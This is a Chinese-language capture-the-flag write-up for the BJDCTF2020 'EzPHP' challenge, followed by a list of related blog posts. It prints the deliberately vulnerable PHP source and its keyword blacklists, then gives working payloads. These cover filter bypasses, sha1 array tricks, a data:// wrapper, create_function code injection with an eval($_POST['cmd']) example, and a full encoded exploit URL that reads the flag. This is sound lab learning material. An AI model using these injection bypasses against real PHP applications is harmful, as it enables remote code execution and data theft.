[BJDCTF2020]EzPHP
说明这里就有flag有关的东西
base32解密
1nD3x.php
<?php
highlight_file(__FILE__);
error_reporting(0); $file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";if($_SERVER) { if (preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])) die('You seem to want to do something bad?');
}if (!preg_match('/http|https/i', $_GET['file'])) {if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { $file = $_GET["file"]; echo "Neeeeee! Good Job!<br>";}
} else die('fxck you! What do you want to do ?!');if($_REQUEST) { foreach($_REQUEST as $value) { if(preg_match('/[a-zA-Z]/i', $value)) die('fxck you! I hate English!'); }
} if (file_get_contents($file) !== 'debu_debu_aqua')die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){extract($_GET["flag"]);echo "Very good! you know my password. But what is flag?<br>";
} else{die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else { include "flag.php";$code('', $arg);
} ?>
第一个限制
if($_SERVER) { if (preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])) die('You seem to want to do something bad?');
}
因为$_SERVER[‘QUERY_STRING’]不会url解码,可以通过url编码绕过
第二个限制
if (!preg_match('/http|https/i', $_GET['file'])) {if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { $file = $_GET["file"]; echo "Neeeeee! Good Job!<br>";}
} else die('fxck you! What do you want to do ?!');
preg_match值匹配第一行,句尾加上%0a进行绕过,绕过preg_match主要有两种方法即换行符与PRCE回溯此处超出。
payload:dedu=aqua_is_cute%0a
第三个限制
if($_REQUEST) { foreach($_REQUEST as $value) { if(preg_match('/[a-zA-Z]/i', $value)) die('fxck you! I hate English!'); }
}
$_REQUEST方式接收请求的优先级别默认情况下先接受POST,所以在get的同时post数字就可以了。
payload:POST:debu=1&file=2
第四个限制
if (file_get_contents($file) !== 'debu_debu_aqua')die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");
这里利用data协议即可:file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61
与此同时file也需要被post一下。
第五个限制
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){extract($_GET["flag"]);echo "Very good! you know my password. But what is flag?<br>";
} else{die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}
因为sha1无法处理数组,当sha1()的参数为数组,就会返回false,所以可用数组绕过
payload:shana[]=1&passwd[]=2
第六个限制
if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else { include "flag.php";$code('', $arg);
}
这里用到了create_function()代码注入
create_function()函数有两个参数args和args和args和code,用于创建一个lambda样式的函数
例如:$myfunc = create_function('$a, $b', 'return $a+$b;');
相当于:
function myfunc($a, $b){return $a+$b;
}
当第二个参数无限制时:
$code=return $a+$b;}eval($_POST['cmd']);//
就会变成:
function myfunc($a, $b){return $a+$b;
}
eval($_POST['cmd']);//}
上一阶段sha1比较的过程中,extract($_GET["flag"]);
这里我们可以进行变量覆盖,从而掌控住arg变量与code变量。
同时根据上面的可以通过闭合符号来执行自己定义的函数:
&flag[arg]=}a();//&flag[code]=create_function
拼接过后就应该是:
function {}a();//}
这个a我们是可以随时改成其他的函数的。
但是此时很多函数都被禁用了,文件中包含了flag这个文件,利用get_defined_vars()将所有变量与值都进行输出,此时payload就为:
flag[arg]=}var_dump(get_defined_vars());//&flag[code]=create_function
输出出来但还不是真正的flag,提示是在另一个文件里面,flag4.php,此时可以利用require,来代替include,利用base64编码绕过flag的过滤,利用require()来代替require" "。
http://a9f790f1-3df5-4d89-9a4e-7c778bc45274.node3.buuoj.cn/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%63%6f%64%65]=create_function&%66%6c%61%67[%61%72%67]=;}define(aaa,fopen(~(%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f),r));while(!feof(aaa))var_dump(fgets(aaa));fclose(aaa);%23
debu=1&file=1
[BJDCTF2020]EzPHP相关推荐
- BJDctf2020 Ezphp
BJDctf2020 Ezphp 目录 BJDctf2020 Ezphp 2.preg_match绕过 3.$_REQUEST绕过 4.file_get_contents绕过 5.sha1函数.比较类 ...
- [BJDCTF2020]EzPHP 1
目录 前言 源码 思路 第一层过滤 第三层过滤 第四层和第二层过滤 第五层 第六层过滤 题解 解法一 解法二 总结 前言 这题也来自Y1ng师傅的babycode,刚刚做完babycode,顺便刷一刷 ...
- 2021-8-23 [BJDCTF2020]EzPHP 知识点:php超全局变量,create_function,各种php的bypass
首先,本文借鉴的大老婆博客如下: 出题大佬博客,详细讲解了各种知识点 一位大佬的详细解题过程(偷懒,自己就不写了) 就简单写写(赋值粘贴)一些比较重要的知识点(× create_function函数: ...
- [BUU刷题记录]day01-起步
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io contain ...
- Buuctf -web wp汇总(三)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...
- BUUCTF笔记之Web系列部分WriteUp(五)
1.[GWCTF 2019]枯燥的抽奖 查看源码得到check.php,访问得到代码: <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: te ...
- cl.ez6.xyz index.php,[BJDCTF2020]EzPHP-POP链
那次某信内部比赛中有道pop链问题的题目,我当时没有做出来,所以在此总结一下,本次以buu上复现的[MRCTF2020]Ezpop为例. 题目 1 Welcome to index.php 2 < ...
- BUUCTF-[BJDCTF2020]EzPHP
一道挺不错的绕正则表达式的题. 打开环境 点一点发现啥也没有,日常看源码.Ctrl+U发现了一个加密,本以为是base64,但是解码失败,试了试base32成功了 这里推荐一个网站CTF在线工具-CT ...
- [BJDCTF2020]Mark loves cat
首先打开网站看到的是一个个人博客,这种常规的 类似实战题目 先扫描目录看看 路径扫描 没错这真的是我的字典,就7个路径,哈哈哈,还在收集啊 git泄露 看到了一个 .git 泄露 用了俩工具测试,无任 ...
最新文章
- ElasticSearch学习总结(三):查询总结
- python if语句和循环语句
- python excel详解_python操作excel详解
- SAP Spartacus All Units页面里的按钮style和对应的scss实现
- 深度学习分布式训练小结
- JeecgBoot Minio版本6.0.13升级到8.0.3修改方法
- C++使用简单的函数指针
- ENVI 监督分类Max stdev from Mean 参数IDL中的设置
- 打造个人多媒体服务器之二
- SkinSharp破解版与模版皮肤下载与使用
- python reshape函数参数-1(X.reshape(X.shape[0], -1).T)
- 简单快速将pdf转换成jpg的方法
- arduino八段数码管使用
- 【视野】中国的程序员培训是不是有问题?
- 细数互联网企业组织架构大调整
- 绝地求生信号枪只能在服务器吗,绝地求生:信号枪很多人不知道的4大用处 第4居然可以这么用!...
- Java泛型面试也能虐暴你
- 权威认可 | 悬镜云鲨RASP荣获信通院“2021金融行业年度卓越创新案例”
- 微软office365服务器地址,由世纪互联运营的 Office 365 的 URL 和 IP 地址范围
- macbook pro 700自己换SSD 开启AHC
热门文章
- JavaScript 正则表达式的学习
- 3月15日 Glority睿琪软件春招笔试回忆
- 视口锁定解锁lisp_CAD基础知识汇总第十四期:如何创建异形视口和解除视口锁定?...
- 专注安防监控,雄迈消费类产品全线标配AI功能,让家用类监控更智能
- word从当前页设置页码
- 考计算机软考还需要评定职称吗,软考评职称还需要年限吗
- 直角三角形 射影定理 欧几里德定理
- 截取文本内容,包括中英文,多余则显示省略号
- 活动报名|ICLR 2023杰出论文奖一作张博航:从图双连通性的角度重新思考图神经网络的表达能力...
- Windows下搭建ARM11裸机开发环境(1):工具安装